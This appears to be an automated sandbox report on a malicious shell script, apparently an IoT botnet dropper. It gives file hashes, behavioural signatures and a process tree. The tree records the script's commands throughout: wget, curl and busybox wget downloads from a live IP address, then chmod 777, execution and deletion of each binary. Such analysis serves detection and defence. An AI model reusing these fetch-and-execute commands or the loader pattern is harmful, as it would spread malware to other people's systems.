Analysis
-
max time kernel
150s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:12
Static task
static1
Behavioral task
behavioral1
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
-
Size
10KB
-
MD5
5ecd8e3f2eb51a7dc020f24e33b8cc57
-
SHA1
be4322853738933aa75ef6ade68437e1c6290afe
-
SHA256
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f
-
SHA512
f43f15b94f1eab3f628a22d9dec691977126ced5801a808fc091f5847ab5cb1bf5bce49da1056fa82a1c14ccecddf1d0c76ecab6fcb74951c56b7c87a331dce1
-
SSDEEP
192:eyoVNmlHxyrasCqOpG+qpOVNmlHx3qOpG+0:e/VNmlRyrasH8VNmlRm
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 27 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 725 chmod 869 chmod 923 chmod 930 chmod 875 chmod 887 chmod 905 chmod 942 chmod 746 chmod 893 chmod 917 chmod 855 chmod 881 chmod 948 chmod 737 chmod 835 chmod 784 chmod 899 chmod 765 chmod 960 chmod 954 chmod 731 chmod 808 chmod 815 chmod 821 chmod 911 chmod 936 chmod -
Executes dropped EXE 27 IoCs
ioc pid Process /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ 726 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 732 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP 738 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM 747 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 767 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W 786 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p 809 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm 816 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 822 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU 836 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf 856 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO 870 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm 876 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX 882 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W 888 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 894 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm 900 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 906 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU 912 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf 918 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO 924 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p 931 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX 937 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm 943 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 949 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP 955 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM 961 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 870 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO 871 rm 921 curl 924 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO 922 busybox 925 rm 860 wget 864 curl 868 busybox 920 wget -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 curl File opened for modification /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX curl File opened for modification /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W curl File opened for modification /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm curl File opened for modification /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU curl File opened for modification /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf curl File opened for modification /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO curl File opened for modification /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm curl File opened for modification /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 curl File opened for modification /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ curl File opened for modification /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM curl File opened for modification /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W curl File opened for modification /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 curl File opened for modification /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 curl File opened for modification /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p curl File opened for modification /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm curl File opened for modification /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 curl File opened for modification /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO curl File opened for modification /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP curl File opened for modification /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 curl File opened for modification /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf curl File opened for modification /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX curl File opened for modification /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU curl File opened for modification /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p curl File opened for modification /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM curl File opened for modification /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP curl File opened for modification /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm curl
Processes
-
/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh1⤵PID:692
-
/bin/rm/bin/rm bins.sh2⤵PID:701
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:703
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:709
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:719
-
-
/bin/chmodchmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- Executes dropped EXE
PID:726
-
-
/bin/rmrm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:727
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:728
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:730
-
-
/bin/chmodchmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Executes dropped EXE
PID:732
-
-
/bin/rmrm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:733
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:734
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:736
-
-
/bin/chmodchmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:739
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:740
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:745
-
-
/bin/chmodchmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:763
-
-
/bin/chmodchmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:769
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:770
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:781
-
-
/bin/chmodchmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:788
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:806
-
-
/bin/chmodchmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:814
-
-
/bin/chmodchmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:818
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:820
-
-
/bin/chmodchmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:832
-
-
/bin/chmodchmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:839
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:840
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:852
-
-
/bin/chmodchmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:860
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:868
-
-
/bin/chmodchmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:870
-
-
/bin/rmrm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:871
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:874
-
-
/bin/chmodchmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:880
-
-
/bin/chmodchmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:886
-
-
/bin/chmodchmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:892
-
-
/bin/chmodchmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:898
-
-
/bin/chmodchmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:904
-
-
/bin/chmodchmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:910
-
-
/bin/chmodchmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:916
-
-
/bin/chmodchmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:920
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:922
-
-
/bin/chmodchmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:924
-
-
/bin/rmrm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:925
-
-
